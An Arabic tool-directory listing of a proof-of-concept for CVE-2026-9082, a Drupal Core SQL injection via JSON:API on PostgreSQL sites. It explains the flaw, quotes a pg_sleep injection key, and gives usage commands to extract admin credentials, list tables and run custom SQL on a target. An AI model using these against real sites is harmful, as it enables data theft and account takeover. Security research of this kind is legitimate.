Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-9082-Drupal-PoC — Drupal Core PostgreSQL SQL Injection PoC - CVE-2026-9082. إثبات المفهوم الأخلاقي لثغرة دروبال التي تسمح بحقن SQL مجهول عبر وحدة JSON:API على المواقع المدعومة بقاعدة بيانات PostgreSQL. | Kitploit
أدوات/GitHubGitHub/7h30th3r0n3/cve-2026-9082-drupal-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHub7h30th3r0n3/cve-2026-9082-drupal-poc

CVE-2026-9082-Drupal-PoC

Drupal Core PostgreSQL SQL Injection PoC - CVE-2026-9082. إثبات المفهوم الأخلاقي لثغرة دروبال التي تسمح بحقن SQL مجهول عبر وحدة JSON:API على المواقع المدعومة بقاعدة بيانات PostgreSQL.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
234منذ 3 أشهرتمت المراجعة من قبل Kitploit

CVE-2026-9082 - إثبات المفهوم (PoC) لحقن SQL في Drupal Core عبر PostgreSQL

Drupal Logo


نظرة عامة

يوفر هذا المستودع إثبات المفهوم الأخلاقي (PoC) لـ CVE-2026-9082، وهي ثغرة حقن SQL عالية الخطورة في Drupal Core تؤثر على جميع المواقع التي تستخدم PostgreSQL وتشغل Drupal من الإصدار 8.0 حتى 11.3.9.

تقع الثغرة في معالج شرط استعلام الكيانات الخاص بـ PostgreSQL ويمكن استغلالها من قبل المستخدمين المجهولين (غير المصادق عليهم) عبر وحدة JSON:API، والتي تكون ممكّنة افتراضيًا منذ Drupal 9.

التنبيه الرسمي: SA-CORE-2026-004


ملخص الثغرة

يتضمن Drupal Core واجهة برمجة تطبيقات (API) لتجريد قاعدة البيانات مصممة لتعقيم الاستعلامات ومنع حقن SQL. ثغرة في فئة شرط استعلام الكيانات الخاصة بـ PostgreSQL (core/modules/pgsql/src/EntityQuery/Condition.php) تسمح للمهاجم بحقن SQL عشوائي عبر مفاتيح مصفوفة يتحكم بها المستخدم تُمرر عبر معاملات تصفية JSON:API.

  • معرف CVE: CVE-2026-9082
  • التنبيه: SA-CORE-2026-004
  • البرنامج المتأثر: Drupal Core
  • الإصدارات المتأثرة: 8.0.0 – 11.3.9 (خلفية PostgreSQL فقط)
  • أُصلح في: 11.3.10, 11.2.12, 10.6.9, 10.5.10
  • الخطورة: عالية جدًا — 20/25 على مقياس مخاطر Drupal
  • المصادقة: غير مطلوبة (مجهول)
  • التأثير: تسريب البيانات، تصعيد الامتيازات، تنفيذ التعليمات البرمجية عن بعد (RCE) في بعض التهيئات
  • ناقل الهجوم: HTTP — مفاتيح مصفوفة شرط التصفية في JSON:API

كيفية العمل

  1. تقوم طريقة translateCondition() في فئة شرط PostgreSQL بالتكرار عبر $condition['value'] وتستخدم مفاتيح المصفوفة لبناء أسماء عناصر نائبة PDO:
    $where_id = $where_prefix . $key;
  2. تسمح JSON:API للمستخدمين المجهولين بتوفير قيم تصفية مع مفاتيح مصفوفة عشوائية عبر معاملات URL:
    filter[x][condition][value][MALICIOUS_KEY]=val
  3. تتكون العناصر النائبة المسماة PDO فقط من أحرف [a-zA-Z0-9_]. عندما يحتوي المفتاح على )، يتوقف PDO عن تحليل اسم العنصر النائب — كل ما بعد ذلك يصبح SQL حرفيًا محقونًا في الاستعلام.
  4. عن طريق إرسال مفتاح مثل 1))/**/OR/**/(SELECT pg_sleep(5)) IS NOT NULL)--، يُغلق المهاجم عبارة IN() ويُضيف SQL عشوائي، بينما يتم استيفاء الربط لـ :prefix_1 بواسطة مفتاح شرعي 1 في نفس الطلب.

المراجع والإسناد

  • التنبيه: SA-CORE-2026-004
  • تطبيق التصحيح: ea9524d9
  • المكتشف: michaelmaturi (مذكور في التنبيه)

إشعار قانوني

هذه الأداة مخصصة فقط لاختبار الأمان المصرح به والأغراض التعليمية والبحث الأخلاقي. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.


التثبيت

root@kitploit:~
git clone https://github.com/7h30th3r0n3/CVE-2026-9082-Drupal-PoC.git
cd CVE-2026-9082-Drupal-PoC
pip install requests rich

الاستخدام (واجهة سطر الأوامر)

root@kitploit:~
# Check if target is vulnerable
python3 CVE-2026-9082.py -u https://target.com --check

# Extract PostgreSQL version
python3 CVE-2026-9082.py -u https://target.com --version

# Extract database info (user + db name)
python3 CVE-2026-9082.py -u https://target.com --dbinfo

# Extract Drupal admin credentials (uid=1)
python3 CVE-2026-9082.py -u https://target.com --admin

# List database tables
python3 CVE-2026-9082.py -u https://target.com --tables

# Custom SQL query extraction
python3 CVE-2026-9082.py -u https://target.com --query "SELECT current_user"

# Use boolean-based extraction (faster but less reliable)
python3 CVE-2026-9082.py -u https://target.com --version -m bool

# Interactive mode (no arguments)
python3 CVE-2026-9082.py

المؤلف

  • تم تطوير إثبات المفهوم بواسطة 7h30th3r0n3
  • تم اكتشاف الثغرة بواسطة michaelmaturi
تنزيل الأداة